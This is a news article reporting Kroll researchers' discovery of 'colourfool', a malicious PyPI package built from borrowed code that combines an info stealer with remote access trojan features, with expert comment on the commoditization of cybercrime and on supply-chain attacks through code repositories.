Frankenstein malware stitched together from code of others disguised as PyPI package
Crime-as-a-service vendors mix and match components as needed by client
A malicious package discovered in the Python Package Index (PyPI) is the latest example of what threat hunters from Kroll called the continued "democratization of cybercrime," with the bad guys creating malware variants from the code of others.
It reflects the as-a-service trend in ransomware, distributed denial-of-service (DDoS), and other malware, which lets crooks with little or no skills lease or buy weapons to launch their own attacks. In this case, it means pulling together code from multiple sources to build the malware in packages uploaded into PyPI.
Dropping malicious packages into PyPI, GitHub, NPM, RubyGems, and other repositories, and enticing developers to inadvertently put them into their products is a fast-growing part of threats against the software supply chain.
Kroll researchers, who developed a tool to better monitor PyPI for malicious packages, discovered one called "colourfool" that they dubbed "Colour-Blind."
The package came with a full-featured information stealer and remote access trojan (RAT) capabilities written in Python. There was only one "suspiciously large" Python file with its only purpose being to download a file from the internet, hide it from users, and execute it.
"The function, therefore, immediately seemed suspicious and likely malicious," researchers Dave Truman and George Glass wrote in a report Thursday.
There was a range of other indicators of suspicious activity, including using a hardcoded URL for downloading resources from the internet. The file contained Python script – code.py – with info-stealing functions, including keylogging and cookies.
The RAT came with a range of capabilities like collecting passwords, terminating applications, taking screenshots of the user's desktop, seeking IP data and putting it on the screen, stealing cryptocurrency wallet information, and spying on the user via a webcam.
Cobbling the code together
Truman and Glass described some of the code within the file as "blatantly malicious," and said one example was a function designed to get past antivirus software by adding its location to the exclusion path for Microsoft Defender Antivirus in Windows.
Other parts of the code indicated a weak attempt at obfuscation – essentially variables named with a simple pattern that contained only two characters.
All of this convinced the Kroll researchers that they were likely dealing with malware made up of parts derived from others.
- CI/CD: Necessary for modern software development, yet it carries a lot of risk
- It's official: BlackLotus malware can bypass Secure Boot on Windows machines
- PlugX RAT masquerades as legit Windows debugger to slip past security
- Cry Havoc and let slip dogs of war ... there's an upgraded malware server in town
"The combination of obfuscation alongside blatant malicious code indicates that it is unlikely that all the code was developed by a single entity," they wrote. "It is possible that the final developer mostly utilized other people's code, adding it via copy and paste."
Another indication was that the malware included a function to determine whether it is running inside a virtual machine and another to see if there were security research tools running in the system. Such evasive behavior usually is seen when the attacker wants to avoid having the malware running in an automatic security sandbox, which can tag it as malicious.
"In this case, however, after the malware gets the information, it does nothing with most of it," they wrote. "For example, the result from the security research tool search is never referenced or checked. This behavior adds strength to the hypothesis that the code has been plagiarized from multiple sources, and the final developer might not be particularly sophisticated in their methods."
The malware developer also includes an embedded "Snake" game that is likely directly copied from a GitHub repository and doesn't seem to serve a purpose, another proof point of the irregular sourcing of the code.
For Mike Parkin, senior technical engineer for Vulcan Cyber, what Kroll found was less about the "democratization" of cybercrime and more the "commoditization" of it.
"Threat actors have been adapting their business models for a while and they are already at the point where they offer crime-as-a-service on the dark web and have brokers who can mix and match attack components to meet a client's specific needs," Parkin told The Register.
There also will continue to be attacks on code repositories, which give miscreants an easier path to get their malicious packages in front of developers.
"They're skipping several steps in the attack chain by having the target do a large part of the work for them," he said. "That makes them an especially inviting target, and we can expect threat actors to stay with this approach until the repos deploy defenses to stop it … When those holes are closed, the attackers will find new ones." ®